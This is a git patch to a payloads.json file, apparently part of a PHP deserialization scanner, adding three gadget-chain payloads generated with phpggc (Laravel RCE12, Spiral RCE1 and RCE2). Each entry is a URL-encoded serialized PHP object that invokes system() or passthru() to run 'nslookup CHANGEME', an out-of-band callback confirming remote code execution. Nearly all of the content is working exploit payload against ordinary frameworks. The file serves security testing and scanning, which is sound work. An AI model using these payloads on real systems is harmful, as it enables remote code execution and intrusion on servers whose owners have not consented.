From c861944b109ee6b55efbc5bc24e181788574297b Mon Sep 17 00:00:00 2001
From: Ricardo <ricardojba@users.noreply.github.com>
Date: Sat, 26 Nov 2022 22:43:39 +0000
Subject: [PATCH] Update payloads.json

added Laravel RCE 12 and Spiral RCE1/RCE2
---
 res/payloads.json | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/res/payloads.json b/res/payloads.json
index 3e33d02..43a7556 100644
--- a/res/payloads.json
+++ b/res/payloads.json
@@ -125,6 +125,24 @@
     "gen_with": "./phpggc Laravel/RCE11 <function> <parameter>",
     "payload": "O:37:\"Symfony\\Component\\Mime\\Part\\SMimePart\":3:{s:11:\"%00*%00_headers\"%3Ba:1:{s:8:\"dispatch\"%3Bs:6:\"system\"%3B}s:6:\"inhann\"%3BO:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:5:\"event\"%3Bs:63:\"nslookup CHANGEME\"%3Bs:6:\"events\"%3BO:15:\"Faker\\Generator\":1:{s:13:\"%00*%00formatters\"%3BN%3B}}s:49:\"%00Symfony\\Component\\Mime\\Part\\AbstractPart%00headers\"%3BR:7%3B}"
   },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Laravel 5.8.35, 7.0.0, 9.3.10 (12)",
+    "gen_with": "./phpggc Laravel/RCE12 <function> <parameter>",
+    "payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:60:\"Illuminate\\Foundation\\Support\\Providers\\RouteServiceProvider\":1:{s:6:\"%00*%00app\"%3BO:23:\"Illuminate\\View\\Factory\":1:{s:9:\"%00*%00finder\"%3BO:37:\"Symfony\\Component\\Console\\Application\":3:{s:50:\"%00Symfony\\Component\\Console\\Application%00initialized\"%3Bb:1%3Bs:47:\"%00Symfony\\Component\\Console\\Application%00commands\"%3Ba:1:{i:0%3BO:33:\"Illuminate\\Foundation\\AliasLoader\":1:{s:10:\"%00*%00aliases\"%3Ba:1:{i:0%3Bs:3:\"key\"%3B}}}s:52:\"%00Symfony\\Component\\Console\\Application%00commandLoader\"%3BO:27:\"Illuminate\\Cache\\Repository\":1:{s:8:\"%00*%00store\"%3BO:20:\"PhpOption\\LazyOption\":3:{s:28:\"%00PhpOption\\LazyOption%00option\"%3BN%3Bs:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:6:\"system\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}}}}}"
+  },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Spiral 2.7.0 <= 2.8.13 (1)",
+    "gen_with": "./phpggc Spiral/RCE1 <function> <parameter>",
+    "payload": "O:35:\"Monolog\\Handler\\RotatingFileHandler\":4:{s:13:\"%00*%00mustRotate\"%3Bb:1%3Bs:11:\"%00*%00filename\"%3Bs:8:\"anything\"%3Bs:17:\"%00*%00filenameFormat\"%3BO:30:\"Spiral\\Reactor\\FileDeclaration\":1:{s:42:\"%00Spiral\\Reactor\\FileDeclaration%00docComment\"%3BO:20:\"PhpOption\\LazyOption\":2:{s:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:8:\"passthru\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}s:13:\"%00*%00dateFormat\"%3Bs:1:\"l\"%3B}"
+  },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Spiral -2.8+ (2)",
+    "gen_with": "./phpggc Spiral/RCE2 <function> <parameter>",
+    "payload": "O:7:\"App\\App\":1:{s:12:\"%00*%00finalizer\"%3BO:21:\"Spiral\\Boot\\Finalizer\":1:{s:33:\"%00Spiral\\Boot\\Finalizer%00finalizers\"%3Ba:1:{i:0%3Ba:2:{i:0%3BO:20:\"PhpOption\\LazyOption\":2:{s:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:8:\"passthru\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}i:1%3Bs:3:\"get\"%3B}}}}"
+  },
   {
     "_needs_dynamic_payload_editing": false,
     "name": "Monolog 1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+ (1)",